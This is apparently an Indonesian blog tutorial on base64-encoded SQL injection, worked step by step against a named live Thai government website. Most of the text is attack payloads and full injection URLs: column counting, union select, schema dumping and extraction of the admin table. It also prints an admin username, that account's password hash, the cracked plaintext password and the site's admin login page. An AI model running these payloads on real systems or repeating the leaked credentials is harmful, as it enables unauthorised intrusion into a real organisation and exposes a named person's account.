Sql Base64

materi by = Gilang
 

Live target: http://dwf72.go.th/


1. Pertama kalian cari dulu parameter webnya, buat inject


site:dwf72.go.th inurl:php?id=


2. Buat sql base64 ini kalian butuh apk or tools online buat encode decode base64 nya


https://play.google.com/store/apps/details?id=duy.com.text_converter


3. Kalian pilih choose method, lalu klik base64


Lalu kalian masukan angka parameternya 184


Maka akan keluar encodenya MTg0==


4. Pada angka 184 kalian kasi '


Jadi 

184'


Setelah itu kalian salin hasil encodenya


MTg0Jw==


Lalu paste diparam seperti ini


http://dwf72.go.th/news.php?id=MTg0Jw==


Maka akan keluar error/vuln


5. Kalian lakukan order by seperti saat sql-i biasa

Tapi encode dalam bentuk base64


184 order by 1 -- -


Lalu salin hasil encodenya ke parameternya, sampai error ya


(order by 27) normal

http://dwf72.go.th/news.php?id=MTg0IG9yZGVyIGJ5IDI3IC0tIC0=


(order by 28) error

http://dwf72.go.th/news.php?id=MTg0IG9yZGVyIGJ5IDI4IC0tIC0=


artinya kita cuma menggunakan 1 - 27 saja


6. Kita encode lagi:

-184 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -


Hasil:

LTE4NCB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMsMjQsMjUsMjYsMjcgLS0gLQ==


Lalu masukan ks parameter webnya lagi:


http://dwf72.go.th/news.php?id=LTE4NCB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMsMjQsMjUsMjYsMjcgLS0gLQ==


Dan keluar angka togelnya


7. Lanjut ke tahap dump


Kita encode lagi:

-184 union select 1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -


Hasil:

LTE4NCB1bmlvbiBzZWxlY3QgMSwyLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3IC0tIC0=


Lalu kita masukan lagi ke parameternya:

http://dwf72.go.th/news.php?id=LTE4NCB1bmlvbiBzZWxlY3QgMSwyLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3IC0tIC0=


Dan akan muncul tablenya


8. Selanjutnya kita scroll kebawah lalu cari table username & password


9. Lalu kita dump, tapi jangan lupa encode dulu


-184 union select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -


Hasil:

LTE4NCB1bmlvbiBzZWxlY3QgMSwyLChTRUxFQ1QoQHgpRlJPTShTRUxFQ1QoQHg6PTB4MDApLChTRUxFQ1QoQHgpRlJPTShhZG1pbilXSEVSRShAeClJTihAeDo9Q09OQ0FUKDB4MjAsQHgsdXNlcm5hbWUsMHgyMDNhM2EyMCxwYXNzd29yZCwweDNjNjI3MjNlKSkpKXgpLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3IC0tIC0=


Link:


http://dwf72.go.th/news.php?id=LTE4NCB1bmlvbiBzZWxlY3QgMSwyLChTRUxFQ1QoQHgpRlJPTShTRUxFQ1QoQHg6PTB4MDApLChTRUxFQ1QoQHgpRlJPTShhZG1pbilXSEVSRShAeClJTihAeDo9Q09OQ0FUKDB4MjAsQHgsdXNlcm5hbWUsMHgyMDNhM2EyMCxwYXNzd29yZCwweDNjNjI3MjNlKSkpKXgpLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3IC0tIC0=


Dan disini maka akan terlihat username passwordnya


10. Lalu kita ambil paling atas


sirinthip :: d01e270f53588fa9dcecd95968fba56374fc85ab


Untuk 

user : sirinthip

password : hash dulu 


Kita hash

d01e270f53588fa9dcecd95968fba56374fc85ab


Disini:

https://hashes.com/en/decrypt/hash


11. Lalu kalian salin hasilnya:

d01e270f53588fa9dcecd95968fba56374fc85ab:puypam


Jadi


user : sirinthip

password : puypam


12. Lalu kita cari adlognya dulu


http://dwf72.go.th/login


Ini adlognya


13. Dan kalian tinggal Login


Jika sudah maka akan tampil dasboard admin

0 Response to "Sql Base64"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel